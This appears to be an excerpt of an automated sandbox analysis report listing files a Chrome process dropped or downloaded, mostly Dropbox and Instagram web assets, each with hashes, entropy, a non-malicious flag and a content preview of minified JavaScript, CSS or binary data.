                                                                        Preview:wOF2.......,...............B.......................d.......`..\....a..... ..R.....6.$..x..~.. .....|..5[r.......bJU..T...^.Ui5.$..c.OI...(...V.%......... ........"..]..$m+.X..........'..p..".Y...q..f.......B[........tjS.6..ZF.V.'8..]L.;f.....p...H.JtYQ.r.......U..v.F.....M..L.Js... ....j)o3/...L.r...%....('......O......7.a..&..z.!/.w.%.....p.P.o..#.....$..~.&r...=.a;.K......RE.....U..F..M..ARd.c.:........Ji..z.X].&..6..2Y.dM..6...8`I....T..BqPc.W.].......q......lG\.....{.j..|.Ab.s.C...q...w.9*...j`. F.a4b..o..?:......~.........Al;...~n=.(.=b.cQlc...+..V.2..J..........wx.Y.q.UxQF....JQ.{...D"PA...Dx...^........].!.......{'.#..I.P...R........p....$K.%Y..!.n..,d..sO...(O@.R...q.(...t:.T....){*p1w..Pc..V(._... t|.....rm....ed%2....D"O"OrM.\....z+.=U..QL.qK...V....Ckw($..........mH..0...v......H=.Y.|.5.~.3......b.g..X..M.R..Q...UZ.b.lV..-.$#Q..]?1[....*O.:.&74.]l...H.W.n.l.?..-.K.*r......Z.W..<..HG.c...N...2..V.;..a.....`.T..q.`#...?r...T.Ak....y.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (515)
                                                                        Category:dropped
                                                                        Size (bytes):909
                                                                        Entropy (8bit):5.272638896751489
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:29079E173E1A94E2B207B13A54F8F4CF
                                                                        SHA1:1CC7AD582397338D1D4D345D43BAAEF4D44F22E6
                                                                        SHA-256:CFA27FCC10554BD4ABE67636F37075B8D95053F0FC9E218680371B0BDC3EC0BC
                                                                        SHA-512:2863A0B5D0CCC739CAAEFB5014AF0BDEA89A472238B70470EF6B8985B46EC4EC02EF9F32B3A0C9A10EE4F2DC1BBB98D5464D9490B0271CA3532922672897E31E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b02f0eb1-1e4d-307a-b6d9-6520fcbcb24c")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_file_icon","./c_dig-content-icons_icons_folder-base-default-large","./e_file_viewer_static_scl_page_file"],(function(e,n,t,a,c){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var l=i(n);const o=({className:e,variant:n,isFolder:i,contentName:o})=>i?l.default.createElement(a.FolderBaseDefaultLarge,null):l.default.createElement(t.FileIcon,{className:e,extension:c.file_extension(o),size:n});o.displayName="SharedContentIcon",e.SharedContentIcon=o}));.//# sourceMappingURL=c_sharing_components_shared_content_icon.js-vflyucU5M.map..//# debugId=b02f0eb1-1e4d-307a-b6d9-6520fcbcb24c
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1732)
                                                                        Category:dropped
                                                                        Size (bytes):2122
                                                                        Entropy (8bit):5.435366140364713
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D9215B99AAAA816018F0476883CF8CAF
                                                                        SHA1:215BD203FE5E853344FA5A711DCD75A7DA2E3650
                                                                        SHA-256:1D5AF50E238E1FB980DFFA88046C547C7E2B7769E3C5946117D22DE7BDE8902D
                                                                        SHA-512:D3938C7790F12EB4A505F53FE295F7CFC34095DCA43DD50B7B512E7E07D5BAD67C38488856A50A96A48F73352A781B18DBDDABC6132298CF1A709BE329B5262A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="3c9e041b-dcb5-36fa-8e91-e27fed21fc71")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.CloudDownloadLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M16.245 10.005C16.15 7.49 14.579 6 12 6s-4.15 1.492-4.245 4.005C5.242 10.1 3.75 11.67 3.75 14.25c0 2.578 1.492 4.142 4 4.24v-1.507c-1.652-.085-2.5-.997-2.5-2.733 0-1.825.926-2.75 2.75-2.75h1.25v-1.25c0-1.825.925-2.75 2.75-2.75s2.75.925 2.75 2.75v1.25H16c1.825 0 2.75.925
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (55096)
                                                                        Category:downloaded
                                                                        Size (bytes):55476
                                                                        Entropy (8bit):4.944924198579946
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A9C53D99825469261E2396DF2260ECAD
                                                                        SHA1:509BA7C7C5931AFE36B940D167B33CC4446243D4
                                                                        SHA-256:5BCCDCCE2471D5262931B52F89B9D952106C49C849BFDB4FCA5C68F6C29D6725
                                                                        SHA-512:93155CA726E306D242EA5EE80AB7E23224B50D458F615272C20F5306F0B98931D8CFA7AF0C784F560DF6AB28291098314FAC660CF9D21383ECEAAE1B418171DF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vflqcU9mY.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-components@20.8.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Mode--bright,:root{--scheme__color:light;--scheme__inverse__color:dark;--spacing__base_unit:8px;--spacing__unit--0_5:4px;--spacing__unit--1:8px;--spacing__unit--1_5:12px;--spacing__unit--2:16px;--spacing__unit--2_5:20px;--spacing__unit--3:24px;--spacing__unit--4:32px;--spacing__unit--5:40px;--boxshadow__elevation1:0px 8px 32px rgba(30,25,25,.03),0px 8px 16px rgba(30,25,25,.03),0px 4px 8px rgba(30,25,25,.03),0px 2px 4px rgba(30,25,25,.03),0px 1px 2px rgba(30,25,25,.03);--boxshadow__elevation2:0px 16px 80px rgba(30,25,25,.03),0px 32px 48px rgba(30,25,25,.03),0px 16px 32px rgba(30,25,25,.03),0px 8px 24px rgba(3
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 250 x 541, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):176752
                                                                        Entropy (8bit):7.996378111268534
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7FDE4DAD3B60A5A6F89F81AAD821E33A
                                                                        SHA1:586783872936A8DE6FCB8BB99E28B9BF964E84C1
                                                                        SHA-256:5845BA9B16BDE454793E65D35FE16EEDF485C7C6E485C22C518CB2DB64208A2E
                                                                        SHA-512:E08D2416EDB017DAE28999ECE162C339FAC7F5D0EC0B20DDAB9BD30197DB995F874DCFB269D55ED168EEE956D2BED05DDD40ECAE8EFCFFE745C1637563D9A037
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR..............2`....7IDATx^.M.@..........o..-.L.L......a...i......h......:...H.F..O...MN_.S]..o.AP....b.......Iq...G.....n0->.{....O"t.9.tNc....CD"_..np..t....,..8J..$.4...E.....A..;.=..Z.n..oL(ns.P.4.$..l...>.E.K....B......5tF..x.Z..q..?X.W...>.....J.[..'G..Z.../4..h.K..r...?.imb..}..[2...Q..{t.<...@..5.b..iS...|...d..$.dm.....Z..}.'/1.u]c6.!.s.v;..i...k...m.(...?.i....Xg......a..[$..(i.R.&B..G.5.Y.......&.R....l.C.5Ds..(..,EYJ..*{...[.n...v..7:..vu.N.{.>..y.s...%&''q||.M.......555...Fgg'......X]].y......F...9.\.[O...,p...$&&"++.... ...1>>....+.......333 .........:,//.?D.u.'Grsv.t.....TUUA...#..........(++CEE.....;^.J..............A.aii...y<??.....L.F.n..144...`.....]....111.....EFF.())AXX.NNN pvv........+..j.....>!..8.?SSSdP$d..K.........%dgg#66.^^^,...........a}}.... H.t>...C....XW...055.j.V...(...r.....666.....H_YY.bqq.............5..Q|..m....'....A.X9i.....5..-((....'...z..........(....r>V.....Y.rpp .!o"o......9.....z{{....&&&
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                        Category:downloaded
                                                                        Size (bytes):4286
                                                                        Entropy (8bit):3.6767668884768048
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F25511F4158C2DFAB6AA11A07D026E4A
                                                                        SHA1:99F63CF1694FA5E52F43EB967462EA0D9EEF7513
                                                                        SHA-256:C0906D540D89DBE1F09B24F17B7F35B81350E8D381C1558B075C28EA913C450D
                                                                        SHA-512:0BFB19AEC453A1C4D4B8F39602BF8BBF0A98182A98E29E1E1708EABFD99E3168855994A56061ED462C29B099137C226E25DDD274B46ED2F443C2C515A530B731
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon.ico
                                                                        Preview:...... .... .........(... ...@..... .........%...%............a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...Q...R...`...b...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...b...]...P....C...=..T...\...b...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a..._...T...a...................a...T..._...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...b...[
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1213)
                                                                        Category:dropped
                                                                        Size (bytes):1592
                                                                        Entropy (8bit):5.241499120545095
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2DEE311FF7E9B6ECAF70444519F42077
                                                                        SHA1:30D336CFC88E484E0815B4237FAF7D4F72B49DEB
                                                                        SHA-256:502D29A93980EA692FC29B1606992BF2ECD2E552B196AF2657AE2A6F0DDC9146
                                                                        SHA-512:48486B788A0220471F0C725F475F3ECC2014715797C16F4186F2630365C4316C3E806D56234619C68FFBD30CAC7B6064D422BA37A69A8CB1F5732896879DE909
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="31678a8d-da5d-3ce0-8adc-bb1fd4f2e6be")}catch(e){}}();.define(["require","exports","./e_edison","./c_api_v2_routes_user_metadata_provider","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_lodash","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_core_exception"],(function(e,i,n,s,o,t,a,c,r,d){"use strict";async function _(){const{ensureCookiesAreEnabled:i}=await new Promise((function(i,n){e(["./c_edison_cookies_check"],i,n)}));if(i()&&function(){var e;try{const i="www.dropbox.com"===(null===(e=window.top)||void 0===e?void 0:e.location.host),n=window.self!==window.top;return!i||!n}catch(e){return!0}}()){(async()=>{const{showToastFromCookie:i}=await new Promise((function(i,n){e(["./c_core_toast_toast_on_init"],i,n
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65243)
                                                                        Category:downloaded
                                                                        Size (bytes):112852
                                                                        Entropy (8bit):5.444704056374891
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:546756F14F48CEE921F7B3ABB893E171
                                                                        SHA1:7D5EE13F792F0F5FD32C3F57F617C4D2E414922E
                                                                        SHA-256:D42868ABB1818851CA9A7B34245B1E299CE262A7BAC3D582EE14854C75F6D4D7
                                                                        SHA-512:2B62F258C326E2348B01BE45F5B1B61AC0E7A8D4D9F9C37FACF9101272E8402B60283F696E6781F72E30AC7708D87581F4D6D7AF3CF724995FE963ECA3728573
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_signup_signin_unified_susi-vflVGdW8U.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dbd08f96-9ae9-3d72-a855-5cbf52fdd0f3")}catch(e){}}();.define(["require","exports","./c_api_v2_noauth_client","./e_file_viewer_static_scl_page_file","react","./c_core_i18n","./c_api_v2_routes_user_metadata_provider","./c_viewer_refresh","./c_core_notify","./c_hive_schemas_sharing-request_access_user_events","./c_auth_login_email_error_banner","./c_plugin_utils_getImageDefaultSizes","./c_ui_image","./e_edison","./c_ui_sprite","./c_src_sink_index","./e_core_exception","./c_unified_susi_register_password_validator","./c_security_passwords","./e_data_modules_stormcrow"],(function(e,t,a,i,n,o,s,r,l,d,u,c,g,_,p,m,f,S,v,E){"use strict";function h(e){return e&&e.__esModule?e:{default:e}}var b=h(n);const y=["gclid","oqa","trigger","_tk","_camp","_ad","_net","_kw","utm_campaign","utm_conte
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (459)
                                                                        Category:dropped
                                                                        Size (bytes):478
                                                                        Entropy (8bit):5.051486206873402
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C1E2FE37D8F95678D7EC4807597616B8
                                                                        SHA1:C0FE964203E8C3B0C3491B41C93D350FB0855DF8
                                                                        SHA-256:E0BDD6A25A1DA2D79CD6AC1AF21EA09FE8A44DFA33F655FB5FAD1D40A77FB761
                                                                        SHA-512:DD98ACF0C237AD95D6BFB7373BD9D924B5307D2C12B9C2EB441432B57ABCF71B131112FA17D0909CBB81C248858AA1965883634DD3D26324CB2C1FF19EB546CE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("CAAFetaSavePasswordInterstitial.entrypoint",["CAAFetaSavePasswordInterstitialQuery$Parameters","JSResourceForInteraction"],(function(a,b,c,d,e,f,g){"use strict";a={getPreloadProps:function(){return{queries:{query:{parameters:c("CAAFetaSavePasswordInterstitialQuery$Parameters"),variables:{}}}}},root:c("JSResourceForInteraction")("CAAFetaSavePasswordInterstitialDialog.react").__setRef("CAAFetaSavePasswordInterstitial.entrypoint")};g["default"]=a}),98);
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2361)
                                                                        Category:dropped
                                                                        Size (bytes):2752
                                                                        Entropy (8bit):5.429189097664246
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CAE8D5985AB157E428BCD17054B52CF2
                                                                        SHA1:2E3BF2D73AF8B9E91DD2E96B067B4213B000DF93
                                                                        SHA-256:7F7B6227C5A2A0CEAEF9CE8DF33930A23B6D0610C46E85F34DE6B34C126B3C0A
                                                                        SHA-512:4BE53A51B77938C3590DF47E846697C9D90E04E1063CD7B04B5DD67FA72911CE56E71C707A9B11ED0E7FFF280A37D7C744646C5C838DAEFF2C384309381F462D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b0610094-f01d-3f43-8a79-4c7999e83bf0")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.DeleteForeverLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M11.75 17a.75.75 0 1 0-.75-.75.709.709 0 0 0 .75.75Zm.75-7v4.595a3.01 3.01 0 0 0-1.5 0V10h1.5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M19.5 7h-4v-.75A2.25 2.25 0 0 0 13.25 4h-2.997a2.25 2.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (345)
                                                                        Category:downloaded
                                                                        Size (bytes):719
                                                                        Entropy (8bit):5.4268207348578485
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A6BB6938F33DA73E36416F666EEAF4AF
                                                                        SHA1:31410C15155D92CF71A9ACE282B528B013402064
                                                                        SHA-256:923E7C8A9F076FA33D4BC63072C30744BA4E0251E00C1D3F5B29735E82A0FBC5
                                                                        SHA-512:047542FBBF28F632EFBE100AAEF77C9914C358B84B4111683EFDC1FBB3DF577951BB571A6DEEFB99E0EA7CCA826DF82294AAB95AAD035897F88994D863135D06
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/logos-vflprtpOP.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-logos@4.2.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Mode--bright,:root{--color__glyph__primary:#1e1919;--color__glyph__accent:#0061fe;--color__inverse__glyph__primary:#696663;--color__inverse__glyph__accent:#3984ff}.dig-Mode--dark,.dig-Theme--dark{--color__glyph__primary:#696663;--color__glyph__accent:#3984ff;--color__inverse__glyph__primary:#1e1919;--color__inverse__glyph__accent:#0061fe}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (5083)
                                                                        Category:dropped
                                                                        Size (bytes):5477
                                                                        Entropy (8bit):5.272049315308005
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F5C191375CBC20E30FF3E25DC4448005
                                                                        SHA1:7EBF78F837FE368CC41430B1A08C6F228C87E632
                                                                        SHA-256:47EF31793E794C21D38AF07D47DB1AD4AFA473137E184F2B711CA5FE192CE872
                                                                        SHA-512:A79F3D34092045BB500571CF1C82C792E58E946E5D160ABE78B2281992842610CF3C74A8B0FB134EC119A035D51803D23D5E01642B94DB9601B50DD9BE72B97E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="20262b36-a35d-3798-9b64-bfc47e1c9ef4")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var c=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,c.get?c:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var c=n(t);e.BackTenSecondsLine=e=>c.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},c.createElement("path",{d:"M8.5 10V8.5H6.771c1.062-1.338 2.796-2 5.229-2 4.374 0 6.5 2.126 6.5 6.5H20c0-5.159-2.841-8-8-8-2.973 0-5.169.95-6.5 2.74V5.5H4V10h4.5Zm2.335 9.418v-1.26H9.386v-5.157h-1.08c-.108.693-.432 1.026-1.296 1.08v1.017h1.053v3.06h-1.52v1.26h4.292Zm3.482.153c1.863 0 3.141-1.044 3
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (20398)
                                                                        Category:downloaded
                                                                        Size (bytes):271247
                                                                        Entropy (8bit):5.404275062744862
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C9599A20C95555D453FE98D22EA1C5CF
                                                                        SHA1:712E6D72AC23AA55F7018C2CD196688A243BE267
                                                                        SHA-256:5CDBDCEFECEFDC4A6DB4633571711EAFDAA4F90F27217FDD2D72C8B52E33AAB7
                                                                        SHA-512:21FC4F996A96B9BF62FC853B8514BBFD92CA469D600B674185B8984BBD4705D235A19D7F893BACDEC075260894CCDB5B3799D6DB2C4C0126DDA701EEE228FD9B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/y1/r/pePedL2ZgUk.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 12044
                                                                        Category:dropped
                                                                        Size (bytes):3830
                                                                        Entropy (8bit):7.949446708302354
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E9C52F01FEC1FD74BA45C1E482479B94
                                                                        SHA1:240FFC56AC2A2D5A829B1624D5E57776DF923913
                                                                        SHA-256:6139A0F7AA27644FCF470FB367FE2A03A46ABA500D499D0689BAF7B589FFD3FB
                                                                        SHA-512:B7CE8203C0055C52FCA80F82CF7D80EC3F50E2FF38E5CCA5E32C19D351CF623C0CB0BD5ADDB44A3210534214EDCB6EDE9BC6DA68615C3AD9FDA70EB52C510783
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........Zks.:..._asgT.^....-.q%..Nj.8k%..R.\0.I......x$.o..OQ....$..h..8}.)_.d....y............_.|.....=..L. H3..'./.).w...D..d,N.{....w1......2r..T..aEW..&.A...S:s...../O..7....ixx2..T...j}s...T...e..)...W..#.....xp..IF..a.F+,..b.Q....r.xt|x. .'...J......3.1b.....)b........J....S..q.. ...?..LRE9.StI. ..Y."-..|..=AT&.^.\-h....._...}..%N}......$x .9.....5z.ww.",.....O.`..+.$.G...$.i.<.jA%.b.-.S.l6Z0RA...tIxf.T .V..{.g.b..P.y.u.....=..l..s9'e....bF....l&.r..{.d.0.i.G*..s..a......So.q.@...J..?p.......4z.I`...S..|N.....7.9...._.g-..2...F*.....v.i.."s.>A....../.h.......OYJ.*C..@,.^...A.Gt.~..uOOC..".....`N.......UB.S.$R>...X-.D<0.>...b'..$_5..k@g.....;..F8...).f.>!..6..X-.|/}.^....5......"8>...y..!....R$_..*H.Oe...s.Af...'3..D..........oO...g...y...kS..J7q&.v%.j..8.....@..e...T\=.$..2.0..4InID...l.QL.Q...k.s.*.....F..3..?r.. C.Oj.........bH..>....j......<...[.._.+....@G..73_M.S...W(....%.h......G..Fx.../.....bod..`.......n-..in.po.d...h.J.@d,kcIs
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1814)
                                                                        Category:dropped
                                                                        Size (bytes):2205
                                                                        Entropy (8bit):5.4557875419006745
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BBD69D5F935D21F280A6661DD04518CE
                                                                        SHA1:D92A9CCF35860F7DFB09886D80A3CFA9D3B8CA6A
                                                                        SHA-256:C6BBA1DF2C8709A92AE9012F5B9AA7C0DEA1252964AFCE297369DE59D2769B57
                                                                        SHA-512:472667D71C6E282C411A902000DC969C169AFF06309A7C7518933991C94659A6515EFC2E2B749498AD7D45D5B82AFF9F519AEF7B3855D92D0D6C7CA1E86AFA62
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="202dec56-6336-3028-8bd7-6f01a8448000")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.AddCircleLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12.5 7.5H11V11H7.5v1.5H11V16h1.5v-3.5H16V11h-3.5V7.5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{d:"M11.75 4C6.535 4 4 6.535 4 11.75s2.535 7.75 7.75 7.75 7.75-2.535 7.75-7.75S16.965 4 11.75 4Zm0 14c-4.322 0-6.25-1.927-6.25-6.25 0-4.322
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2267)
                                                                        Category:downloaded
                                                                        Size (bytes):2673
                                                                        Entropy (8bit):5.3634949887314445
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8AAC1AF39C3479BCA6A5002BA0649965
                                                                        SHA1:314C065CFFA26C3701C2A880DAFD2517F1894D38
                                                                        SHA-256:61130B3AD9367E96DEFE4C538149E36AD5092D5AEB3AEC435B6C6808DC1DD134
                                                                        SHA-512:313654ADE2DC54D0C880A62DA4B8FC889B1ACD654E2373F2CD7ACF0C5951D0C58AC47B84F2AFB012FD07AE08820EAD846EF3BBCB3B79BF28960D0BA178B4C56D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_position-upper-right-vfliqwa85.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aeccb1fe-0909-38c8-96df-1fbbfaecad6e")}catch(e){}}();.define(["exports","react"],(function(e,v){"use strict";function h(e){if(e&&e.__esModule)return e;var v=Object.create(null);return e&&Object.keys(e).forEach((function(h){if("default"!==h){var t=Object.getOwnPropertyDescriptor(e,h);Object.defineProperty(v,h,t.get?t:{enumerable:!0,get:function(){return e[h]}})}})),v.default=e,Object.freeze(v)}var t=h(v);e.PositionCenterLine=e=>t.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},t.createElement("path",{d:"M3.5 8.5h5v-5h-5v5ZM5 5h2v2H5V5Zm10.5-1.5v5h5v-5h-5ZM19 7h-2V5h2v2ZM3.5 20.5h5v-5h-5v5ZM5 17h2v2H5v-2Zm10.5 3.5h5v-5h-5v5ZM17 17h2v2h-2v-2Zm-2.5-7.5h-5v5h5v-5Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.PositionLowerLeftLine=e=>t.createElement("svg",{vi
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2431)
                                                                        Category:downloaded
                                                                        Size (bytes):2827
                                                                        Entropy (8bit):5.386617844840613
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:322B60813E8A76D5E11B47C8F4148F70
                                                                        SHA1:3819349AF9B04417448CCFDCA1CAD77B2B607308
                                                                        SHA-256:1ABF541B4658A2817201A36135C1481FA12A3C13E2AA31942654ECD569BB3350
                                                                        SHA-512:39CD0F2A9046EFBC20FAA7C5EAEDF512ACEBE3B4BABA8071221104B23DBC09C8BE9F16B636CA5FDFD249E6E4A31F5C2C5FCE72F268C5E572AB3B065E76B55122
                                                                        Malicious:false
                                                                        Reputation:unknown
